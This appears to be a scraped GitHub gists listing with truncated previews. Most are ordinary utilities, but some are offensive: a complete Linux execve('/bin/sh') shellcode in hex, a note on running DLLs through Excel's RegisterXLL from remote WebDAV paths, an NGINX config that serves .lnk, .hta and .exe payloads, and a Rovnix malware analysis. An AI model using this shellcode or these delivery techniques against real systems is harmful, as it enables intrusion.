:shipit:
Wait, did I stream that out loud?

Aekr1_ //akrasia 0x25bit

@zachelko
zachelko / skater.cpp
Created April 8, 2010 06:23
Basic C/C++ code obfuscator.
// Zach J. Elko
// 2010
// skater.cpp
//
// I've wanted to make one of these for a while now. I got bored and
// whipped this up in about 3 hours. There are a lot of improvements
// that can/should be made, but it's not bad for the short amount of
// time put into it.
//
// Basic C/C++ code obfuscator.
@ruzickap
ruzickap / win7-admin.bat
Last active October 18, 2023 02:47
win7 customization file. Run right after you first log in as administrator.
:: Tested on Windows 7
@echo.
@echo Test connection settings
powershell -command "$client = new-object System.Net.WebClient; $client.DownloadFile('http://www.google.com', 'c:\del')"
if %ERRORLEVEL% NEQ 0 (
@echo Can not download files from Internet !!!
pause
exit
@enkomio
enkomio / rovnix_conn.py
Created August 25, 2015 16:53
Rovnix key generation and data encryption
from unicorn import *
from unicorn.x86_const import *
from capstone import *
import base64
import time
from collections import deque
@zeux
zeux / minid3d9.h
Created February 12, 2016 08:32
Minimal set of headers for D3D9
// This file is designed to be included in D3D9-dependent code instead of d3d9.h, while adding minimal amount of junk
#pragma once
#include <BaseTyps.h>
#include <BaseTsd.h>
// stdlib.h
#ifndef _INC_STDLIB
#define _INC_STDLIB
#endif
@DreamVB
DreamVB / main.cpp
Created September 16, 2016 22:35
Backup Files and Folders
/*
bBackup folder copy
Version 4
By Ben a.k.a DreamVB
*/
#include <iostream>
#include <Windows.h>
#include <string>
#include <algorithm>
@hasherezade
hasherezade / syscall_extractor.cpp
Last active August 30, 2023 21:47
Extracts syscalls list from NTDLL.DLL
#include <stdio.h>
#include <Windows.h>
// based on: https://www.evilsocket.net/2014/02/11/on-windows-syscall-mechanism-and-syscall-numbers-extraction-methods/
// author: @evilsocket
// modified by: @hasherezade
#define IS_ADDRESS_BETWEEN( left, right, address ) ( (address) >= (left) && (address) < (right) )
PIMAGE_SECTION_HEADER SectionByRVA( PIMAGE_SECTION_HEADER pSections, DWORD dwSections, DWORD rva )
{
@hasherezade
hasherezade / aes_crypt.cpp
Last active August 6, 2024 15:31
AES 128 - encrypt/decrypt using Windows Crypto API
#include <Windows.h>
#include <wincrypt.h>
#include <stdio.h>
#pragma comment(lib, "advapi32.lib")
#define AES_KEY_SIZE 16
#define IN_CHUNK_SIZE (AES_KEY_SIZE * 10) // a buffer must be a multiple of the key size
#define OUT_CHUNK_SIZE (IN_CHUNK_SIZE * 2) // an output buffer (for encryption) must be twice as big
//params: <input file> <output file> <is decrypt mode> <key>
@resilar
resilar / execve.c
Created March 8, 2017 17:07
Linux x86(-64) - execve("/bin/sh", ["/bin/sh", 0], 0) shellcode (38 bytes)
/*
* Linux x86(-64) - execve("/bin/sh", ["/bin/sh", 0], 0) shellcode (38 bytes)
* 31c050488b1424eb105478065e5fb03b0f05595b40b00bcd80e8ebffffff2f62696e2f736800
*
* - offset - bytes 32-bit code 64-bit code
* 0x00000000 31c0 xor eax, eax xor eax, eax
* 0x00000002 50 push eax push rax
* 0x00000003 48 dec eax rex.w
* 0x00000004 8b1424 mov edx, dword [esp] mov rdx, qword [rsp]
* 0x00000007 eb10 jmp 0x19 jmp 0x19
@ryhanson
ryhanson / ExcelXLL.md
Last active November 8, 2024 14:51
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local; it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk, but the dropped file is not the one loaded into the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in, which is essentially a specially crafted DLL with specific exports. More info on XLLs can be found on MSDN.

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

@jivoi
jivoi / gist:a33ace2e25515a31aa2ffbae246d98c9
Created June 14, 2017 13:27
Serving Random Payloads with NGINX
# Serving Random Payloads with NGINX
# add set_random module https://github.com/openresty/set-misc-nginx-module#set_random
# edit file /etc/nginx/sites-enabled/default
set_random $uri 1 3;
map $uri $payloads {
1 /payload.lnk;
2 /payload.hta;
3 /payload.exe;